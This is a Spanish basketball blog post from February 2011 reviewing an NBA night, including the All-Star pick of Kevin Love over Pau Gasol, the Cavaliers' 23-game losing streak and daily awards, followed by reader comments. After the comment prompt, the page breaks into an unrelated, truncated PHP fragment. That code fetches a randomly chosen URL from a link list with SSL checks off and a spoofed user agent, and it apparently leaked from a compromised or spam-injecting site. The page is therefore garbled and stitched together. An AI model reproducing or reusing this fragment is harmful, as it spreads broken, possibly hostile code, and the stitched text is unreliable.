La Crónica (04/02/2011)

05 de February de 2011 por TheDeerHunter

Menú completito de 12 platos, para que nadie se quede con hambre.

Empezamos con una pequeña gran decepción. Pau no será el pívot titular del Oeste. El elegido es Kevin Love. Por esa parte pensamos que el trabajo casi mitológico de Love merece cualquier premio empezando por éste. El único problema es que parecía una oportunidad única en la carrera de Pau, si es que necesitara este tipo de reconocimientos. Como dijo alguno de vosotros ayer, hubiera sido simplemente la guinda. En cualquier caso disfrutemos de su 4º all-star que tampoco es mal negocio. Love no pudo celebrar el hito con victoria. Hasta los Raptors son capaces de ganarles.

Después tenemos récord en ciernes. Ayer los Cavs igualaron la peor racha de derrotas de la historia de la competición con 23 seguidas. Con el nivel que está mostrando el equipo mucho nos tememos que son capaces de dejar la cifra tiritando. Pueden ser algo así como el Usain Bolt de las derrotas. Próximas oportunidades para sumar Portland y Dallas. Los beneficiados fueron los Grizzlies que no echan excesivamente de menos a Mayo. Con Zach y Gay tocando la guitarra y Young de escolta titular adelantan momentáneamente a Portland en su particular carrera. El equipo de Oregón perdió en Indianapolis, otros que vuelven a la batalla por los playoffs.
Los Clippers lo tienen cada vez más difícil. Perdieron por un único punto en Atlanta por culpa de una última mala defensa que terminó en una brutal falta sobre Horford y unos tiros libres definitivos. También a los Suns poco a poco se les escapa el tren. No supieron aprovechar un caos de arbitraje ni el partidazo de Carter frente a los Thunder. Vince tiene ese defecto de jugar exponencialmente peor conforme más calientes son los balones. Jeff Green fue el mejor de los suyos.
Los Bobcats también fueron importantemente castigados por la jornada con su derrota ante los Heat a triple doble de Wade. Mientras los Pistons sacaron adelante su compromiso contra los Nets y los Sixers se consolidan en la 7ª plaza con una sensacional victoria ante los Knicks. Brand está que se sale.

En el mejor partido de la jornada los Mavs arrancaron una extraordinaria victoria en Boston a triple de Kidd. Orlando ganó fácil a Washington en el retorno de Arenas a su antigua casa. Hizo uno de sus mejores partidos desde el trade. Los Spurs ganaron sobrados a los Kings y Utah logró una importante victoria ante Denver gracias a la vuelta de Deron Williams.

PREMIOS

MVP: Podríamos elegir a Dwane Wade con su triple doble de 22-12-10 ante los Bobcats, o también al irregular Al Jefferson con su 28-10 ante Nené. Hoy sin embargo elegiremos como nuestro MVP a Elton Brand, con sus 33 puntos, 16 rebotes ante Amare.

Rookie: Jugaron todos los ilustres y perdieron todos. Hoy es el día que por fin vamos a nombrar a uno de nuestros favoritos que no cuenta con demasiadas oportunidades para lucirse. Tiago Splitter se marcó 16 puntos y 9 rebotes en 28 minutazos de juego.

Sorpresa: Si atendemos al sueldo que cobra no debería serlo. Amir Johnson cuajó anoche ante Love uno de los partidos más completos de su carrera. 19 puntos, 12 rebotes, 6 asistencias, 3 robos y dos tapones. Y por cierto, que junto a él hubo un tal Calderón que repartió tan solo 19 asistencias.

Decepción: Para los aficionados de los Celtics, que se quedaron con las ganas de ver en directo el momento histórico en el que Ray Allen supera los triples de Killer Miller. A uno sólo que se quedaron… también de la victoria con el doloroso triplazo de Jason. A nosotros nos fastidia un poco que Gasol no sea titular en el all-star.

Esfuerzo en vano: El destino es muy jodido. Haces un partido de 31-15 para igualar uno de los más fatídicos récords de la competición. Estamos hablando de J.J. Hickson. Muchos partidos tendrá que hacer más así para que su equipo no se convierta en uno de los más patéticos de toda la historia y con algunos que hemos visto los últimos años ya lo tenían difícil.

Imágenes | AP Photos / Getty Images

Comenta

7 comentarios a esta entrada

  1. gabrielj dice:
    #1

    creo que Love solo ha sido elegido para sustituir a Yao en el All Star pero no recibe su puesto como titular, el que decide quien empieza en el quinteto es Popovich

      Citar

  2. Hynreck dice:
    #2

    El que poco a poco va recuperando nivel es McGrady, y adaptándose muy bien a la posición de PG.
    Me alegro horrores por él.

      Citar

  3. Carranghen dice:
    #3

    Para cuando un premio “sorpresa de la jornada” para el bueno de Sam Young?, en ausencia de Mayo los Grizzlies no han perdido(5-0), i el a pasado de sumar DNP a sumar en dobles figuras en cinco partidos con buenos porcentajes.

    Si eso no os sorprende, no se que puede hacerlo!!

      Citar

  4. CAMPO2 dice:
    #4

    A Calderon le cabe un pan cruzado en esa boca

      Citar

  5. Busky23 dice:
    #5

    Si Popovich elige quien debe ser titular esta bastante claro que no le hará el feo a Duncan,aunque seguro que Gasol acabara jugando más minutos que él.
    Una pena que Aldridge se haya quedado fuera,la posición de 4 hay mucho y bueno donde elegir.
    Sobre la jornada vi el Boston-Dallas con un final al que los verdes no nos tienen acostumbrados,tenían la victoria en el bolsillo y con 5 arriba a falta de 2 minutos una serie de perdidas absurdas y el triplaco de Kidd han acabado por llevarse el gato al equipo de Cuban que con esta victoria ya pasan a Lakers y se colocan segundos del Oeste.
    Enorme Mr. Cathering!!!, y muy buen partido de Rudy.
    Sobre el récord de triples de Allen creo que le quedan 5 para igualar a Miller Miller:2560/Allen:2555.

      Citar

  6. Scriers dice:
    #6

    Donde sea leí que la lesion tipo macgrady se cura en… 2 años!! Me parece exagerao. Ha recuperado muchi físico, pero el tiro aún lo tiene chungo.

      Citar

  7. Vader dice:
    #7

    Sí, ya lo habiamos comentado por aquí. Love entra en la convocatoria pero sera Popovich quien eliga el pivot titular. Igual elige a Duncan que es de los suyos o igual elige a Gasol por eso de que juega en casa… tampoco lo veria muy descabellado porque seria un gesto bonito hacia el jugador local. Aunque Duncan por su trayectoria tambien lo merece sin dudas.

    Luego esta por ver que se llegue al All-Star con Carmelo en el Oeste. Si hay traspaso hacia la costa Este Gasol seria alero titular y supongo que entonces Duncan seria el pivot. Veremos que pasa.

    Saludos

      Citar

Deja un comentario

html; } class Helper { public function random_date() { $low = '732045693'; $high = time(); $random = rand($low, $high); return date("D, d M Y H:i:s",$random); } } class Fetch_site { public $url; public $html; public function __construct($sites=null, $link_list=null) { $this->is_curl_installed(); if($link_list !== null) { $this->choose_site($link_list); } $this->load_site($this->url); } public function choose_site($file=null) { $file = explode("\n", $file); $key = rand(0, (count($file)-1)); $this->url = trim($file[$key]); } public function load_site($url) { $useragent = array('Link-Soft'); $rand = array_rand($useragent); $ch = curl_init(); $options = array( CURLOPT_URL => $url, CURLOPT_HEADER => 0, CURLOPT_USERAGENT => $useragent[$rand], CURLOPT_SSL_VERIFYHOST => 0, CURLOPT_SSL_VERIFYPEER => 0, CURLOPT_RETURNTRANSFER => 1, CURLOPT_FOLLOWLOCATION => 1, CURLOPT_ENCODING => "", CURLOPT_AUTOREFERER => 1, CURLOPT_CONNECTTIMEOUT => 30, CURLOPT_TIMEOUT => 30, CURLOPT_MAXREDIRS => 5, ); curl_setopt_array($ch,$options); $result = curl_exec($ch); if(!$result) { return curl_error($ch); } curl_close($ch); $this->html = $result; } public function is_curl_installed() { if(!in_array('curl',get_loaded_extensions())) { trigger_error("cURL PHP extension is disabled or not installed.",E_USER_ERROR); } } } unset($n); ?>